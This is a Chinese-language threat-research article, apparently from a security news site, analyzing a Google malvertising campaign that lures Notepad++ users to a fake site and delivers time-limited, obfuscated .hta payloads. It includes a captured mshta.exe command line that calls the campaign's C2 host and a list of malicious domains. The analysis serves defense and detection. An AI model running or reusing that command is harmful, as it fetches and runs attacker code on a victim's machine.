网安 - 专业的网络安全产业、社区、知识平台

恶意广告投放活动如何通过时效性链接传播HTA脚本

一颗小胡椒2023-10-31 11:12:22

写在前面的话

在最近的研究和分析工作中,我们发现通过Google搜索实现的恶意广告活动有所增加,目前我们也在跟踪和分析其中相关的威胁行为者,并对他们在绕过安全检测并实现攻击链时所使用的技术进行了深入研究。

这些技术将允许威胁行为者通过恶意广告活动来攻击企业用户,并给目标组织带来严重影响,最终实现恶意软件或勒索软件的部署。

在这篇文章中,我们将对一次恶意广告活动进行分析,这个恶意广告活动似乎已经活跃了好几个月,而且它们在指纹识别用户和传播时间敏感的Payload时所使用的技术也非常独特。

针对Notepad++的恶意广告

根据我们的研究发现,这群威胁行为者目前正在针对Notepad++软件进行恶意广告活动。Notepad++是一款适用于Windows操作系统的热门文本编辑器,很多企业或编程人员都会使用这款软件作为默认的文本编辑器使用。

下面这张图片显示的是我们在近期观察到的恶意广告活动部分内容,其中所有的恶意广告都由同一个威胁行为者托管和运行,但他们使用了很多不同的广告账号,而这些账号很可能是在数据泄露事件中被攻击者收集来的。

当目标用户点击其中一个广告时,恶意代码会进行第一层过滤。这很有可能是一种IP地址检查,同时忽略来自VPN和其他非真实IP地址的链接请求,进而跳转到一个诱饵网站:

然而,符合条件的目标用户点击恶意广告之后,会看到一个托管在notepadxtreme[.]com的按照真实Notepad++官网制作的钓鱼网站:

VM检测指纹

当用户点击负责执行系统指纹的JavaScript代码的下载链接时,代码则会进行第二层过滤。我们之前所观察到的一些恶意广告活动会尝试检测模拟器或虚拟机的存在,尽管他们所使用的代码不同且更复杂,但这群威胁行为者也做了同样的事情:

如果检查结果和规则不匹配,那么目标用户将会被重定向到真正的Notepad++官网。同时,每一个潜在的目标用户都会被分配到一个唯一的ID,这个ID将允许他们下载攻击者的Payload。

时间敏感的自定义下载

该恶意广告活动与其他活动的另一个不同之处就在于他们所使用的Payload下载方式。每一个用户都会被分配一个唯一的ID,格式如下:

CukS1=[10 character string][13 digits]

这很可能是为了实现用户跟踪而设计的,这也使得每一次下载行为都是独一无二且时间敏感的:

跟其他恶意广告活动的另一个不同之处在于,这个恶意广告活动的Payload时一个.hta脚本,脚本的命名规范跟上面显示的下载链接风格是一致的:

Notepad_Ver_[10 character string][13 digits].hta

如果你尝试再次使用上述URL地址来下载文件的话,则会遇到404报错:

.HTA Payload

在我们的分析过程中,我们成功捕捉到了攻击者所使用的.hta文件,但分析后发现这个脚本文件并没有完全“武器化”。但是我们发现VirusTotal上在今年7月初曾经有人上传过一次脚本Payload样本。这个样本所使用的命名规范和风格跟我们捕捉到的.hta脚本是一样的,但它针对的是PDF Converter,而不是Notepad++:

这个脚本经过了严格的代码混淆处理,而且VirusTotal的检测结果为0。但通过动态分析后,我们发现其中有一个指向远程域名((mybigeye[.]icu)的链接(使用自定义端口号):

C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe"

https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

除此之外,我们还发现脚本在进行远程连接时,会使用存储在文件名中的相同client_id。

虽然我们不知道威胁行为者在未来的计划是什么,但我们相信这是威胁行为者使用Cobalt Strike等工具访问目标用户受影响设备的恶意基础设施的一部分。

恶意广告威胁行为者一直在技术创新

在过去的几个月里,恶意广告活动的数量有所增加,同时其技术复杂程度也在提升。他们正在使用各种规避技术来绕过广告验证系统的检查,并允许他们针对特定类型的目标用户来实施攻击。有了可靠的恶意软件交付链,威胁行为者就可以更加专注于他们的诱饵页面和恶意软件Payload开发了。

入侵威胁指标IoC

恶意广告域名

switcodes[.]com
karelisweb[.]com
jquerywins[.]com
mojenyc[.]com

Notepad++钓鱼网站

notepadxtreme[.]com

脚本C2

mybigeye[.]icu


payload广告
本作品采用《CC 协议》,转载必须注明作者和本文链接
恶意广告投放活动如何通过时效性链接传播HTA脚本
2023-10-31 11:12:22
在最近的研究和分析工作中,我们发现通过Google搜索实现的恶意广告活动有所增加,目前我们也在跟踪和分析其中相关的威胁行为者,并对他们在绕过安全检测并实现攻击链时所使用的技术进行了深入研究。
深度分析PikaBot如何通过恶意搜索广告实现大规模传播和入侵感染
2024-01-23 10:35:23
在过去的2023年里,Malwarebytes Labs的研究人员发现通过恶意广告实现网络攻击的活动数量有所增加,特别是通过搜索引擎投放的针对企业组织的恶意广告行为。如果要将社工活动包括进来的话,相当于是基于浏览器的攻击活动数量增加了不少。
新型OpcJacker恶意软件通过虚假的VPN传播恶意广告
2023-04-24 09:58:33
在最近一次涉及OpcJacker的活动中,研究人员注意到OpcJacker是通过针对伊朗恶意广告的地理定位传播的。恶意网站检查客户的IP地址以确定受害者是否使用VPN服务。如果受害者正在使用VPN服务,就不会发生上述攻击行为。请注意,这种变化只是一个小细节,对第一阶段shellcode的整体功能没有影响。请注意,数据文件可以是不同的文件格式,CHM格式能被模仿篡改。
CactusPete APT 团队最新 Bisonal 的后门
2020-08-17 11:13:56
运行这些附件会导致感染。一旦恶意软件启动,它就会尝试到达硬编码的C2。使用未经修改的基于HTTP的协议进行通信,对请求和响应主体进行RC4加密,并且加密密钥也被硬编码到样本中。由于RC4加密的结果可能包含二进制数据,因此恶意软件还会在BASE64中对其进行编码,以匹配HTTP规范。并继续推动各种自定义的Mimikatz变体和键盘记录器,用于凭据收集目的,以及特权升级恶意软件。
80%的搜索网站将信息出售,导致用户信息被泄露
2022-09-13 12:04:00
据研究发现,超过80%带有搜索栏的网站会将访问者的搜索字词泄露给谷歌等在线广告商,导致用户信息被泄露。借助这些信息,谷歌等在线广告商可以提供有针对性的广告或跟踪用户的网络行为。
新型Zloader感染链改进隐身和检测逃避技术
2021-09-25 18:16:44
ZLoader(又称 Terdot)于 2016 年被首次发现,是臭名昭著的 Zeus 银行木马的一个变种。目前,该恶意软件仍然在积极开发中,平均每周发布 1 到 2 个新版本。 ZLoader 是一种典型的银行木马,通过窃取 Cookie、密码和任何敏感信息来获利。它攻击世界各地金融机构的用户,还为勒索软件和其他恶意软件提供入口。其较新的版本实现了一个 VNC 模块,支持通过隐蔽信道远程访问失
原来用户隐私是这样被泄露:超八成搜索网站将信息出售
2022-09-15 08:05:11
近日,诺顿LifeLock实验室研究后发现,超过8成带有搜索栏的网站会将访问者的搜索字词泄露给谷歌等在线广告商。很明显这是在赤裸裸地侵犯用户隐私,并公然将敏感信息泄露给庞大的第三方服务商,借助这些信息,谷歌等在线广告商可以提供有针对性的广告或跟踪用户的网络行为。这不仅侵犯了用户隐私,而且还侵犯了用户的知情同意权。
ChromeLoader:新的顽固恶意软件活动
2022-07-12 06:00:00
2022 年 1 月,发现了一个名为ChromeLoader(也称为 Choziosi Loader 和 ChromeBack)的新浏览器劫持者/广告软件活动。尽管使用了简单的恶意广告,该恶意软件还是变得广泛传播,可能会泄露成千上万用户和组织的数据。
关键基础设施安全资讯周报20220530期
2022-05-30 10:42:19
本期关键基础设施安全资讯周报共收录安全资讯31篇。点击文章,快速阅读最新资讯。
一次网站攻击日志分析引发的思考
2021-11-09 08:04:58
24个只检出了10个居然还有一个级别为1的,其他的应该就是有绕过姿势的或者有其他什么目的。主要是读取受害者主机的IP地址、依次生成CRC32的校验、abs之后生成的var应该是保留在3位数以内的一个数值。
一颗小胡椒
暂无描述